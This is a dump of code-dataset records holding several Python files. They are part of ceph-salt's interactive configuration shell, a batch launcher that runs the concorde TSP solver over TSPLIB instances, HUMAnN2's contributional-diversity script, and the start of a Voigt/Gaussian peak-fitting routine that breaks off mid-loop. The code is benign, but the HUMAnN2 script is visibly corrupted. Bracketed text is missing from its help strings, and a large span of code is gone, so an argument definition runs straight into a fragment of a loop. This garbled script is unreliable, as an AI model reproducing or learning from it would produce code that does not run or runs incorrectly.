[],\n 'handler': PillarHandler('ceph-salt:bootstrap_ceph_conf')\n },\n 'Dashboard': {\n 'type': 'group',\n 'help': 'Dashboard settings',\n 'options': {\n 'password': {\n 'default': None,\n 'default_text': 'randomly generated',\n 'sensitive': True,\n 'handler': PillarHandler('ceph-salt:dashboard:password')\n },\n 'username': {\n 'default': 'admin',\n 'handler': PillarHandler('ceph-salt:dashboard:username')\n }\n }\n },\n 'Mon_IP': {\n 'help': 'Bootstrap Mon IP',\n 'default': None,\n 'handler': PillarHandler('ceph-salt:bootstrap_mon_ip')\n },\n }\n },\n 'SSH': {\n 'help': '''\n SSH Keys configuration\n ============================\n Options for configuring the SSH keys used by the SSH orchestrator\n ''',\n 'handler': SSHGroupHandler(),\n 'options': {\n 'Private_Key': {\n 'default': None,\n 'help': \"SSH RSA private key\",\n 'handler': SshPrivateKeyHandler()\n },\n 'Public_Key': {\n 'default': None,\n 'help': \"SSH RSA public key\",\n 'handler': SshPublicKeyHandler()\n },\n }\n },\n 'Time_Server': {\n 'help': '''\n Time Server Deployment Options\n ==============================\n Options to customize time server deployment and configuration.\n ''',\n 'handler': TimeServerGroupHandler(),\n 'options': {\n 'External_Servers': {\n 'type': 'list',\n 'default': [],\n 'help': 'List of external NTP servers',\n 'handler': PillarHandler('ceph-salt:time_server:external_time_servers')\n },\n 'Server_Hostname': {\n 'default': None,\n 'help': 'FQDN of the time server node',\n 'handler': TimeServerHandler('ceph-salt:time_server:server_host'),\n 'required': True\n },\n }\n },\n}\n\n\nclass CephSaltRoot(configshell.ConfigNode):\n help_intro = '''\n ceph-salt Configuration\n =====================\n This is a shell where you can manipulate ceph-salt's configuration.\n Each configuration option is present under a configuration group.\n You can navigate through the groups and options using the B{ls} and\n B{cd} commands as in a typical shell.\n In each path you can type B{help} to see the available commands.\n Different options might have different commands available.\n '''\n\n def __init__(self, shell):\n configshell.ConfigNode.__init__(self, '/', shell=shell)\n\n def list_commands(self):\n return tuple(['cd', 'ls', 'help', 'exit'])\n\n def summary(self):\n return \"\", None\n\n\nclass GroupNode(configshell.ConfigNode):\n def __init__(self, group_name, help, handler, parent):\n configshell.ConfigNode.__init__(self, group_name, parent)\n self.group_name = group_name\n self.help_intro = help\n self.handler = handler\n\n if self.handler:\n for cmd, func in self.handler.commands_map().items():\n setattr(self, 'ui_command_{}'.format(cmd), func)\n\n def list_commands(self):\n cmds = ['cd', 'ls', 'help', 'exit', 'reset', 'set']\n if self.handler:\n cmds.extend(list(self.handler.commands_map().keys()))\n return tuple(cmds)\n\n def summary(self):\n if self.handler:\n return self.handler.value()\n return \"\", None\n\n def ui_command_set(self, option_name, value):\n '''\n Sets the value of option\n '''\n self.get_child(option_name).ui_command_set(value)\n\n def ui_command_reset(self, option_name):\n '''\n Resets option value to the default\n '''\n self.get_child(option_name).ui_command_reset()\n\n\nclass OptionNode(configshell.ConfigNode):\n def __init__(self, option_name, option_dict, parent):\n configshell.ConfigNode.__init__(self, option_name, parent)\n self.option_name = option_name\n self.option_dict = option_dict\n self.help_intro = option_dict.get('help', ' ')\n self.value = None\n\n def _list_commands(self):\n return []\n\n def list_commands(self):\n cmds = ['cd', 'ls', 'help', 'exit', 'reset']\n cmds.extend(self._list_commands())\n return tuple(cmds)\n\n def _find_value(self):\n if self.value is None:\n value = None\n if 'handler' in self.option_dict:\n value, val_type = self.option_dict['handler'].value()\n if value is not None:\n if self.option_dict.get('sensitive', False):\n return '***', None\n return value, val_type\n if 'default_text' in self.option_dict:\n val_type = None\n if self.option_dict.get('required', False):\n val_type = False\n return self.option_dict['default_text'], val_type\n if 'default' in self.option_dict:\n return self.option_dict['default'], None\n raise Exception(\"No default value found for {}\".format(self.option_name))\n return self.value, None\n\n def summary(self):\n value, val_type = self._find_value()\n if isinstance(value, bool):\n value = 'enabled' if value else 'disabled'\n if value is None and self.option_dict.get('required', False):\n return 'not set', False\n\n value_str = str(value)\n return value_str, val_type\n\n def ui_command_reset(self):\n '''\n Resets option value to the default\n '''\n if 'handler' in self.option_dict:\n self.option_dict['handler'].reset()\n else:\n self.value = None\n PP.pl_green('Value reset.')\n\n def _read_only(self):\n if 'handler' in self.option_dict:\n return self.option_dict['handler'].read_only()\n return False\n\n\nclass ValueOptionNode(OptionNode):\n def _list_commands(self):\n return ['set']\n\n def ui_command_set(self, value):\n '''\n Sets the value of option\n '''\n if self._read_only():\n raise Exception(\"Option {} cannot be modified\".format(self.option_name))\n if 'handler' in self.option_dict:\n self.option_dict['handler'].save(value)\n else:\n self.value = value\n PP.pl_green('Value set.')\n\n def ui_complete_set(self, parameters, text, current_param):\n matching = []\n for value in self.option_dict['handler'].possible_values():\n if value.startswith(text):\n matching.append(value)\n return matching\n\n\nclass FlagOptionNode(OptionNode):\n def _list_commands(self):\n return ['enable', 'disable']\n\n def _set_option_value(self, bool_value):\n if self._read_only():\n raise Exception(\"Option {} cannot be modified\".format(self.option_name))\n if 'handler' in self.option_dict:\n self.option_dict['handler'].save(bool_value)\n else:\n self.value = bool_value\n\n def ui_command_enable(self):\n '''\n Enables the option\n '''\n self._set_option_value(True)\n PP.pl_green('Enabled.')\n\n def ui_command_disable(self):\n '''\n Disables the option\n '''\n self._set_option_value(False)\n PP.pl_green('Disabled.')\n\n\nclass ListElementNode(configshell.ConfigNode):\n def __init__(self, value, parent):\n configshell.ConfigNode.__init__(self, value, parent)\n\n\nclass ListOptionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(ListOptionNode, self).__init__(option_name, option_dict, parent)\n value_list, _ = self._find_value()\n self.value = list(value_list)\n for value in value_list:\n ListElementNode(value, self)\n\n def _list_commands(self):\n return ['add', 'remove']\n\n def summary(self):\n value_list, _ = self._find_value()\n return str(len(value_list)) if value_list else 'empty', None\n\n def ui_command_add(self, value):\n if value not in self.value:\n self.value.append(value)\n self.option_dict['handler'].save(self.value)\n ListElementNode(value, self)\n PP.pl_green('Value added.')\n else:\n PP.pl_red('Value already exists.')\n\n def ui_command_remove(self, value):\n if value in self.value:\n self.value.remove(value)\n self.option_dict['handler'].save(self.value)\n self.remove_child(self.get_child(value))\n PP.pl_green('Value removed.')\n else:\n PP.pl_red('Value not found.')\n\n\nclass ConfElementNode(configshell.ConfigNode):\n def __init__(self, key, value, parent):\n configshell.ConfigNode.__init__(self, key, parent)\n self.value = value\n\n def summary(self):\n return self.value, None\n\n\nclass ConfSectionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(ConfSectionNode, self).__init__(option_name, option_dict, parent)\n value_dict, _ = self._find_value()\n self.value = dict(value_dict)\n for parameter, value in self.value.items():\n ConfElementNode(parameter, value, self)\n\n def _list_commands(self):\n return ['set', 'remove']\n\n def summary(self):\n return '', None\n\n @staticmethod\n def _normalize(text):\n text = text.strip()\n if text.startswith('\"') and text.endswith('\"'):\n text = text[1:-1]\n return text.strip()\n\n def ui_command_set(self, expr):\n \"\"\"\n Expression has \" = \" format.\n\n Example: set osd crush chooseleaf type = 0\n \"\"\"\n separator_count = expr.count('=')\n if separator_count != 1:\n PP.pl_red(\"Invalid format, try 'set = '.\")\n return\n expr = self._normalize(expr)\n parameter, value = [self._normalize(s) for s in expr.split('=')]\n child = None\n if parameter in self.value:\n child = self.get_child(parameter)\n self.value[parameter] = value\n self.option_dict['handler'].save(self.value)\n if child:\n child.value = value\n else:\n ConfElementNode(parameter, value, self)\n PP.pl_green('Parameter set.')\n\n def ui_command_remove(self, parameter):\n parameter = self._normalize(parameter)\n if parameter in self.value:\n self.value.pop(parameter)\n self.option_dict['handler'].save(self.value)\n self.remove_child(self.get_child(parameter))\n PP.pl_green('Parameter removed.')\n else:\n PP.pl_red('Parameter not found.')\n\n def ui_command_reset(self):\n for key in self.value.keys():\n self.remove_child(self.get_child(key))\n self.value = {}\n self.option_dict['handler'].save(self.value)\n PP.pl_green('Section reset.')\n\n\nclass ConfOptionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(ConfOptionNode, self).__init__(option_name, option_dict, parent)\n value_dict, _ = self._find_value()\n self.value = dict(value_dict)\n for section in self.value.keys():\n self.add_child(section)\n\n def add_child(self, section):\n handler: PillarHandler = self.option_dict['handler']\n ConfSectionNode(section, {\n 'handler': PillarHandler('{}:{}'.format(handler.pillar_path, section)),\n 'default': {}\n }, self)\n\n def _list_commands(self):\n return ['add', 'remove']\n\n def summary(self):\n return '', None\n\n def ui_command_add(self, section):\n if section not in self.value:\n self.value[section] = {}\n self.option_dict['handler'].save(self.value)\n self.add_child(section)\n PP.pl_green('Section added.')\n else:\n PP.pl_red('Section already exists.')\n\n def ui_command_remove(self, section):\n if section in self.value:\n self.value.pop(section)\n self.option_dict['handler'].save(self.value)\n self.remove_child(self.get_child(section))\n PP.pl_green('Section removed.')\n else:\n PP.pl_red('Section not found.')\n\n def ui_command_reset(self):\n for key in self.value.keys():\n self.remove_child(self.get_child(key))\n self.value = {}\n self.option_dict['handler'].save(self.value)\n PP.pl_green('Config reset.')\n\n\nclass MinionOptionNode(configshell.ConfigNode):\n def __init__(self, minion, handler, parent):\n configshell.ConfigNode.__init__(self, minion, parent)\n self.handler = handler\n\n def summary(self):\n if self.handler:\n return self.handler.value()\n return \"\", None\n\n\nclass MinionsOptionNode(OptionNode):\n def __init__(self, option_name, option_dict, parent):\n super(MinionsOptionNode, self).__init__(option_name, option_dict, parent)\n value_list, _ = self._find_value()\n self.value = list(value_list)\n for value in value_list:\n MinionOptionNode(value, option_dict['handler'].children_handler(value), self)\n\n def _list_commands(self):\n return ['add', 'rm']\n\n def summary(self):\n value_list, val_type = self._find_value()\n if value_list:\n return \"Minions: {}\".format(str(len(value_list))), val_type\n return 'no minions', False\n\n def ui_command_add(self, minion_id):\n matching = fnmatch.filter(self.option_dict['handler'].possible_values(), minion_id)\n counter = 0\n has_errors = False\n for match in matching:\n if match not in self.value:\n new_value = list(self.value)\n new_value.append(match)\n try:\n self.option_dict['handler'].save(new_value)\n self.value = new_value\n MinionOptionNode(match, self.option_dict['handler'].children_handler(match),\n self)\n counter += 1\n except CephSaltException as ex:\n logger.exception(ex)\n PP.pl_red(ex)\n has_errors = True\n if counter == 1:\n PP.pl_green('1 minion added.')\n elif counter > 1:\n PP.pl_green('{} minions added.'.format(counter))\n elif not has_errors:\n PP.pl_red('No minions matched \"{}\".'.format(minion_id))\n\n def ui_command_rm(self, minion_id):\n matching = fnmatch.filter(self.value, minion_id)\n counter = 0\n has_errors = False\n for match in matching:\n new_value = list(self.value)\n new_value.remove(match)\n try:\n self.option_dict['handler'].save(new_value)\n self.value = new_value\n self.remove_child(self.get_child(match))\n counter += 1\n except CephSaltException as ex:\n logger.exception(ex)\n PP.pl_red(ex)\n has_errors = True\n if counter == 1:\n PP.pl_green('1 minion removed.')\n elif counter > 1:\n PP.pl_green('{} minions removed.'.format(counter))\n elif not has_errors:\n PP.pl_red('No minions matched \"{}\".'.format(minion_id))\n\n # pylint: disable=unused-argument\n def ui_complete_add(self, parameters, text, current_param):\n matching = []\n for minion in self.option_dict['handler'].possible_values():\n if minion.startswith(text):\n matching.append(minion)\n return matching\n\n def ui_complete_rm(self, parameters, text, current_param):\n matching = []\n for minion in self.value:\n if minion.startswith(text):\n matching.append(minion)\n return matching\n\n\ndef _generate_option_node(option_name, option_dict, parent):\n if option_dict.get('type', None) == 'group':\n _generate_group_node(option_name, option_dict, parent)\n return\n\n if 'options' in option_dict:\n raise Exception(\"Invalid option node {}\".format(option_name))\n\n if option_dict.get('type', None) == 'flag':\n FlagOptionNode(option_name, option_dict, parent)\n elif option_dict.get('type', None) == 'list':\n ListOptionNode(option_name, option_dict, parent)\n elif option_dict.get('type', None) == 'conf':\n ConfOptionNode(option_name, option_dict, parent)\n elif option_dict.get('type', None) == 'minions':\n MinionsOptionNode(option_name, option_dict, parent)\n else:\n ValueOptionNode(option_name, option_dict, parent)\n\n\ndef _generate_group_node(group_name, group_dict, parent):\n group_node = GroupNode(group_name, group_dict.get('help', \"\"), group_dict.get('handler', None),\n parent)\n for option_name, option_dict in group_dict['options'].items():\n _generate_option_node(option_name, option_dict, group_node)\n\n\ndef generate_config_shell_tree(shell):\n root_node = CephSaltRoot(shell)\n for group_name, group_dict in CEPH_SALT_OPTIONS.items():\n _generate_group_node(group_name, group_dict, root_node)\n\n\nclass CephSaltConfigShell(configshell.ConfigShell):\n # pylint: disable=anomalous-backslash-in-string\n def __init__(self):\n super(CephSaltConfigShell, self).__init__(\n '~/.ceph_salt_config_shell')\n # Grammar of the command line\n command = locatedExpr(Word(alphanums + '_'))('command')\n var = Word(alphanums + ';,=_\\+/.<>()~@:-%[]*{}\" ') # adding '*'\n value = var\n keyword = Word(alphanums + '_\\-')\n kparam = locatedExpr(keyword + Suppress('=') + Optional(value, default=''))('kparams*')\n pparam = locatedExpr(var)('pparams*')\n parameter = kparam | pparam\n parameters = OneOrMore(parameter)\n bookmark = Regex('@([A-Za-z0-9:_.]|-)+')\n pathstd = Regex('([A-Za-z0-9:_.\\[\\]]|-)*' + '/' + '([A-Za-z0-9:_.\\[\\]/]|-)*') | '..' | '.'\n path = locatedExpr(bookmark | pathstd | '*')('path')\n parser = Optional(path) + Optional(command) + Optional(parameters)\n self._parser = parser\n\n\ndef check_config_prerequesites():\n try:\n check_salt_master_status()\n return True\n except CephSaltPillarNotConfigured:\n try:\n PillarManager.install_pillar()\n return True\n except PillarFileNotPureYaml:\n PP.println(\"\"\"\nceph-salt pillar file is not installed yet, and we can't add it automatically\nbecause pillar's top.sls is probably using Jinja2 expressions.\nPlease create a ceph-salt.sls file in salt's pillar directory with the following\ncontent:\n\nceph-salt: {}\n\nand add the following pillar configuration to top.sls file:\n\nbase:\n 'ceph-salt:member':\n - match: grain\n - ceph-salt\n\"\"\")\n return False\n\n\ndef count_hosts(host_ls):\n all_nodes = PillarManager.get('ceph-salt:minions:all')\n deployed = []\n not_managed = []\n for host in host_ls:\n if host['hostname'] in all_nodes:\n deployed.append(host)\n else:\n not_managed.append(host)\n return (len(all_nodes), len(deployed), len(not_managed))\n\n\ndef run_status():\n if not check_config_prerequesites():\n return False\n status = {}\n result = True\n host_ls = CephOrch.host_ls()\n ceph_salt_nodes, deployed_nodes, not_managed_nodes = count_hosts(host_ls)\n status['hosts'] = '{}/{} deployed'.format(deployed_nodes, ceph_salt_nodes)\n if not_managed_nodes:\n status['hosts'] += ' ({} hosts not managed by cephsalt)'.format(not_managed_nodes)\n error_msg = validate_config(host_ls)\n if error_msg:\n result = False\n logger.info(error_msg)\n status['config'] = PP.red(error_msg)\n else:\n status['config'] = PP.green(\"OK\")\n for k, v in status.items():\n PP.println('{}{}'.format('{}: '.format(k).ljust(8), v))\n return result\n\n\ndef run_config_shell():\n if not check_config_prerequesites():\n return False\n shell = CephSaltConfigShell()\n generate_config_shell_tree(shell)\n while True:\n try:\n shell.run_interactive()\n break\n except (configshell.ExecutionError, CephSaltException) as ex:\n logger.exception(ex)\n PP.pl_red(ex)\n return True\n\n\ndef run_config_cmdline(cmdline):\n if not check_config_prerequesites():\n return False\n shell = CephSaltConfigShell()\n generate_config_shell_tree(shell)\n logger.info(\"running command: %s\", cmdline)\n shell.run_cmdline(cmdline)\n return True\n\n\ndef run_export(pretty):\n config = PillarManager.get('ceph-salt')\n if pretty:\n PP.println(json.dumps(config, indent=4, sort_keys=True))\n else:\n PP.println(json.dumps(config))\n return True\n\n\ndef _get_salt_minions_by_host():\n salt_minions_by_host = {}\n minions = SaltClient.caller().cmd('minion.list')['minions']\n for minion_id in minions:\n short_name = minion_id.split('.', 1)[0]\n salt_minions_by_host[short_name] = minion_id\n return salt_minions_by_host\n\n\ndef run_import(config_file):\n with open(config_file) as json_file:\n config = json.load(json_file)\n salt_minions_by_host = _get_salt_minions_by_host()\n minions_config = config.get('minions', {})\n # Validate\n for host in minions_config.get('all', []):\n if host not in salt_minions_by_host:\n PP.pl_red(\"Cannot find host '{}'\".format(host))\n return False\n # Update pillar\n PillarManager.set('ceph-salt', config)\n # Update grains\n minions = GrainsManager.filter_by('ceph-salt', 'member')\n if minions:\n GrainsManager.del_grain(minions, 'ceph-salt')\n for host in minions_config.get('all', []):\n node = CephNode(salt_minions_by_host[host])\n if host in minions_config.get('admin', []):\n node.add_role('admin')\n node.save()\n PP.pl_green('Configuration imported.')\n return True\n","sub_path":"ceph_salt/config_shell.py","file_name":"config_shell.py","file_ext":"py","file_size_in_byte":34981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"525915793","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport itertools\nimport os\nimport multiprocessing\nimport re\n\ndef launcher(tsp_base, n_items_per_city, type_of_items):\n num_items = (int(re.sub('\\D', '', tsp_base)) - 1) * n_items_per_city\n if os.path.isfile(\"tsp_opt_sols/%s.opt.tsp.sol\" % (tsp_base)):\n return\n os.system(\"./concorde --inputfile ../ttp_instances/%s-ttp/%s_n%d_%s_01.ttp > tsp_opt_sols/%s.opt.tsp.log\" % (tsp_base, tsp_base, num_items, type_of_items, tsp_base))\n\nif __name__ == \"__main__\":\n\n tsp_bases = [\"eil51\", \"berlin52\", \"st70\", \"eil76\", \"pr76\", \"rat99\", \"kroA100\", \"kroB100\", \"kroC100\", \"kroD100\", \"kroE100\", \"rd100\", \"eil101\", \"lin105\", \"pr107\", \"pr124\", \"bier127\", \"ch130\", \"pr136\", \"pr144\", \"ch150\", \"kroA150\", \"kroB150\", \"pr152\", \"u159\", \"rat195\", \"d198\", \"kroA200\", \"kroB200\", \"ts225\", \"tsp225\", \"pr226\", \"gil262\", \"pr264\", \"a280\", \"pr299\", \"lin318\", \"rd400\", \"fl417\", \"pr439\", \"pcb442\", \"d493\", \"u574\", \"rat575\", \"p654\", \"d657\", \"u724\", \"rat783\", \"dsj1000\", \"pr1002\", \"u1060\", \"vm1084\", \"pcb1173\", \"d1291\", \"rl1304\", \"rl1323\", \"nrw1379\", \"fl1400\", \"u1432\", \"fl1577\", \"d1655\", \"vm1748\", \"u1817\", \"rl1889\", \"d2103\", \"u2152\", \"u2319\", \"pr2392\", \"pcb3038\", \"fl3795\", \"fnl4461\", \"rl5915\", \"rl5934\", \"pla7397\", \"rl11849\", \"usa13509\", \"brd14051\", \"d15112\", \"d18512\", \"pla33810\", \"pla85900\", ]\n\n number_of_items_per_city = [1, ]\n\n types_of_items = [\"bounded-strongly-corr\", ]\n\n os.system(\"make\")\n\n for comb in itertools.product(tsp_bases, number_of_items_per_city, types_of_items):\n tsp_base, n_items_per_city, type_of_items = comb\n launcher(tsp_base, n_items_per_city, type_of_items)\n","sub_path":"tsp_component/run_all_tsp_problems.py","file_name":"run_all_tsp_problems.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19562258","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function # PYTHON 2.7+ REQUIRED\nimport os\nimport sys\nimport argparse\nimport re\n\ntry:\n from humann2.tools import util\n from humann2.tools.humann2_table import Table\nexcept ImportError:\n sys.exit( \"CRITICAL ERROR: Unable to find the HUMAnN2 python package.\\n\" +\n \"Please check your install.\" ) \n\ntry:\n import numpy as np\n import scipy.spatial.distance as spd\nexcept ImportError:\n sys.exit( \"CRITICAL ERROR: This script requires the python scientific stack (numpy + scipy)\" )\n\ndescription = util.wrap( \"\"\"\nHUMAnN2 utility for calculating contributional diversity\n\nComputes ecological diversity statistics for individual \nfunctions in a stratified HUMAnN2 profile based on their \nper-species contributions. The analysis is restricted to \nfunctions that were 1) detected in a minimum fraction of samples (P),\nwith 2) a minimum abundance (A), and 3) a minimum fraction of function copies\n(E) attributed to species (i.e. not \"unclassified\").\n\nDiversity is calculated over samples where the function passed the\nabove criteria and the \"unclassified\" stratum is excluded. \nMean alpha (within-sample) diversity is calculated with the index. \nMean beta (between-sample) diversity is calculated with the index.\n\"\"\" )\n\n# ---------------------------------------------------------------\n# constants\n# ---------------------------------------------------------------\n\n# ---------------------------------------------------------------\n# command-line interface\n# ---------------------------------------------------------------\n\ndef get_args( ):\n parser = argparse.ArgumentParser(\n description=description, \n formatter_class=argparse.RawTextHelpFormatter,\n )\n util.attach_common_arguments( parser )\n parser.add_argument( \n \"-P\", \"--min-prevalence\",\n default=0.75,\n metavar=\"\",\n help=(\"A function must be detected + well-explained in this fraction of samples to be considered\\n\"\n \"[Default=0.75]\")\n )\n parser.add_argument( \n \"-A\", \"--min-abundance\",\n default=util.c_eps,\n metavar=\"\",\n help=(\"A function must meet this abundance to be considered 'detected' in a given sample\\n\"\n \"[Default=1e-20]\")\n )\n parser.add_argument( \n \"-E\", \"--min-explained\",\n default=0.75,\n type=float,\n metavar=\"\",\n help=(\"Exclude samples where = min_abund:\n if my_exp[i] / my_tot[i] >= min_explained:\n index.append( i )\n if len( index ) / float( n ) >= min_prevalence:\n allowed[f] = index\n # compute stats over passing samples (in index)\n fstats = {}\n for f, index in allowed.items( ):\n inner = fstats.setdefault( f, {} )\n # numpy list slice\n my_tot = total[f][index]\n my_exp = explained[f][index]\n # basic stats (all samples)\n inner[\"1: Prevalence (N)\"] = len( index )\n inner[\"2: Prevalence (frac)\"] = len( index ) / float( len( total[f] ) )\n inner[\"3: Mean abundance\"] = np.mean( my_tot )\n my_frac = my_exp / my_tot\n inner[\"4: Mean explained (frac)\"] = np.mean( my_frac )\n # stack of per-species contributions normalized to _their_ total\n stack = [row[index] / my_exp for row in stacks[f]]\n # convert to 2d array with samples as first axis\n samples = np.vstack( stack ).transpose( )\n # compute diversity (alpha=gini-simpson / beta=bray-curtis)\n inner[\"5: Alpha contrib. div.\"] = adiv_fast( samples )\n inner[\"6: Beta contrib. div.\"] = bdiv_fast( samples )\n # report\n print( \"Contributional diversity report:\", file=sys.stderr )\n tot = len( total )\n print( \" Features considered: {:,}\".format( tot ), file=sys.stderr )\n tot = len( fstats )\n frac = 100 * len( fstats ) / float( len( total ) )\n print( \" Required feature abundance >={} and >={}% of copies explained in >={}% of samples\".format(\n min_abund, 100 * min_explained, 100 * min_prevalence ), file=sys.stderr )\n print( \" Features deemed appropriate for analysis: {:,} ({:.1f}%)\".format( tot, frac ), file=sys.stderr )\n # nested dict of per-function stats\n return fstats\n \n# ---------------------------------------------------------------\n# main\n# ---------------------------------------------------------------\n\ndef main( ):\n args = get_args( )\n table = Table( args.input, last_metadata=args.last_metadata )\n # compute diversity stats\n fstats = contributional_diversity( \n table, \n min_prevalence=args.min_prevalence,\n min_abund=args.min_abundance, \n min_explained=args.min_explained,\n )\n # make output table\n headers = sorted( {v for k in fstats for v in fstats[k]} )\n data = {}\n for f in fstats:\n temp = []\n for h in headers:\n temp.append( fstats[f][h] )\n data[f] = np.array( temp )\n fstats = Table( data, headers=headers )\n fstats.anchor = \"# Feat \\ Stat\"\n fstats.write( args.output, unfloat=True )\n\nif __name__ == \"__main__\":\n main( )\n","sub_path":"humann2/tools/contributional_diversity.py","file_name":"contributional_diversity.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"438756239","text":"from scipy.optimize import curve_fit\r\nfrom scipy import integrate, signal\r\nfrom scipy.special import wofz\r\nfrom scipy.interpolate import UnivariateSpline\r\nimport numpy as np\r\nimport matplotlib\r\n#matplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os, sys\r\n\r\n#import personal modules\r\nfrom peakShapes import voigtFn, gaussFn\r\n\r\ndef peakFitVar(data, LDatum, RDatum, peakShape, numCurves,\r\n savePath = None, filename = None):\r\n '''\r\n Peak fitting function. Fits with ?various? functions? \r\n Implements custom functions for allowing multiple peaks of same shape\r\n Attempts to plot at the end\r\n \r\n Input: Data array [x, y], complete data set\r\n Input: Peak bound indices\r\n Input: Peak shape: {Gaussian, Voigt}\r\n Input: numCurves = number of curves to fit\r\n \r\n Output: ndarray of optimized parameters. \r\n result[i] = opt. param of curve i\r\n FWHM calculated depending on curve type\r\n ''' \r\n\r\n # Convert left and right bounds to integers for indexing\r\n LDat = int(LDatum)\r\n RDat = int(RDatum)\r\n domain = np.arange(LDat, RDat)\r\n # print('LDat: {0}, RDat: {1}'.format(LDat, RDat))\r\n \r\n # Separate x and y data series\r\n xData = data[0]\r\n yData = data[1]\r\n \r\n # Locate position of max in domain \r\n maxInd = np.where(yData[domain] == np.max(yData[domain]))[0][0]\r\n # Shift according to LDat since data is complete \r\n loc = int(LDat + maxInd) # given all data\r\n # print('maxInd: {0}, loc: {1}'.format(maxInd, loc))\r\n \r\n #############################################################################\r\n ### Fit with specified peak shape.\r\n ### Populate guess paramters with residual\r\n #############################################################################\r\n \r\n # Initialize guess and bound arrays with correct shape for each function\r\n xRange = xData[RDat] - xData[LDat]\r\n xDomain = xData[0] - xData[-1]\r\n if peakShape == 'Voigt':\r\n func = voigtFn\r\n # x0 and I values to be replaced during loop\r\n guessTemp = [0, np.min(yData[domain]), 0,\r\n xRange / 10, xRange / 10 ]\r\n # x bounds to be replaced\r\n # [x0, y0, I, alpha, gamma]\r\n boundLowTemp = [xData[LDat], np.min(yData), 0., 0., 0.]\r\n boundUppTemp = [xData[RDat], np.inf, np.inf, xRange, xRange]\r\n\r\n boundLowerPart = [xData[LDat]-0.05*xRange, np.min(yData), 0, 0, 0]\r\n boundUpperPart = [xData[RDat]+0.05*xRange, np.inf, np.inf, xRange, xRange]\r\n elif peakShape == 'Gaussian':\r\n func = gaussFn \r\n # x0 and I values to be replaced during loop\r\n guessTemp = [0, np.min(yData[domain]), 0,\r\n xRange / 10]\r\n # x bounds to be replaced\r\n # [x0, y0, I, sigma]\r\n boundLowTemp = [xData[LDat]-0.05*xRange, np.min(yData), 0., 0.]\r\n boundUppTemp = [xData[RDat]+0.05*xRange, np.inf, np.inf, xRange]\r\n\r\n boundLowerPart = [xData[LDat], np.min(yData), 0, 0]\r\n boundUpperPart = [xData[RDat], np.inf, np.inf, xRange] \r\n\r\n\r\n # Initialize guess params and bounds for number of curves\r\n boundUpper = []\r\n boundLower = []\r\n guess = []\r\n \r\n # init fit array to compare residual \r\n fit = np.ones_like(yData[domain]) * np.min(yData[domain])\r\n \r\n # parameter array: [x0, y0, Intensity, alpha, gamma]\r\n # set up guesses\r\n curveCnt = 0\r\n resid = fit - yData[domain]\r\n errorCurr = np.mean(np.absolute(resid) / (yData[domain]+1))\r\n print('Peak at {0}, start iteration with error = {1}'.format(xData[loc], errorCurr))\r\n while curveCnt < numCurves and errorCurr > 0.001: \r\n # place peak at min residual\r\n xPosGuess = xData[domain][np.argmin(resid)]\r\n guessTemp[0] = xPosGuess\r\n guessTemp[2] = np.max(resid) - np.min(resid)\r\n \r\n # Deal with edge cases.. \r\n xPosLow = xPosGuess - 0.01*xRange\r\n if xPosLow < xData[0]: xPosLow = xData[0]\r\n xPosHigh = xPosGuess + 0.01*xRange\r\n if xPosHigh > xData[-1]: xPosHigh = xData[-1]\r\n \r\n # Update temp bounds to be close to position guess\r\n boundLowTemp[0] = xPosLow\r\n boundUppTemp[0] = xPosHigh\r\n\r\n boundTemp = tuple([boundLowTemp, boundUppTemp])\r\n try: # Fit according to residual\r\n poptTemp, pcovTemp = curve_fit(func, xData[domain], -resid, \r\n bounds=boundTemp, p0=guessTemp) \r\n #print('Fit to residual at {0}'.format(xPosGuess))\r\n except RuntimeError as e:\r\n print(e) \r\n poptTemp = guessTemp\r\n\r\n # Check to see if error decreased\r\n guessHold = guess + list(poptTemp)\r\n fit = func(xData[domain], *guessHold)\r\n resid = fit - yData[domain]\r\n errorNew = np.mean(np.absolute(resid) / (yData[domain]+1))\r\n if np.absolute(errorCurr - errorNew) < 0.0001:\r\n print('no change in error: {}'.format(errorNew))\r\n\r\n if curveCnt == 0: # if first peak does not change error\r\n # build guess real guess array, update fit\r\n guess = guessHold\r\n\r\n # concatenate lists for bounds for real fit\r\n boundLower += boundLowerPart \r\n boundUpper += boundUpperPart\r\n\r\n # Combine bounds into tuple for input\r\n bounds = tuple([boundLower, boundUpper])\r\n \r\n break #end iteration\r\n\r\n # build guess real guess array, update fit\r\n guess = guessHold\r\n\r\n # concatenate lists for bounds for real fit\r\n boundLower += boundLowerPart \r\n boundUpper += boundUpperPart\r\n\r\n # Combine bounds into tuple for input\r\n bounds = tuple([boundLower, boundUpper])\r\n \r\n # Calculate residual, increment, and print error information \r\n errorCurr = errorNew \r\n print('Peak at {0}, iteration {1}: error = {2}'.format(xData[loc], \r\n curveCnt, errorCurr))\r\n curveCnt+=1\r\n\r\n ####################################### Now fit whole peak with acq curves \r\n # Fit full curve, refining guesses\r\n try:\r\n # Curve fit function call using guess and bounds\r\n popt, pcov = curve_fit(func, xData[domain], yData[domain], \r\n bounds=bounds, p0=guess)\r\n except RuntimeError as e:\r\n print(e) \r\n popt = np.array(guess)\r\n \r\n\r\n # Calculate FWHM for each peak fit\r\n if peakShape == 'Voigt':\r\n FWHM = []\r\n c0 = 2.0056\r\n c1 = 1.0593\r\n for i in range(0, len(popt), 5): # grab fwhm for each peak\r\n fg = 2*popt[i+3]*np.sqrt(2*np.log(2))\r\n fl = 2*popt[i+4]\r\n phi = fl / fg\r\n FWHM.append(fg * (1-c0*c1 + np.sqrt(phi**2 + 2*c1*phi + (c0*c1)**2)))\r\n\r\n elif peakShape == 'Gaussian':\r\n FWHM = []\r\n for i in range(0, len(popt), 4): # grab fwhm for each peak\r\n FWHM.append(2*popt[i+3]*np.sqrt(2*np.log(2)))\r\n \r\n ###########################################################################\r\n ### Plotting and saving\r\n ###########################################################################\r\n if (savePath != None) and (filename != None):\r\n plt.figure(figsize=(8,8))\r\n \r\n # Organize final parameters into array\r\n finalParams = []\r\n for j in range(curveCnt): 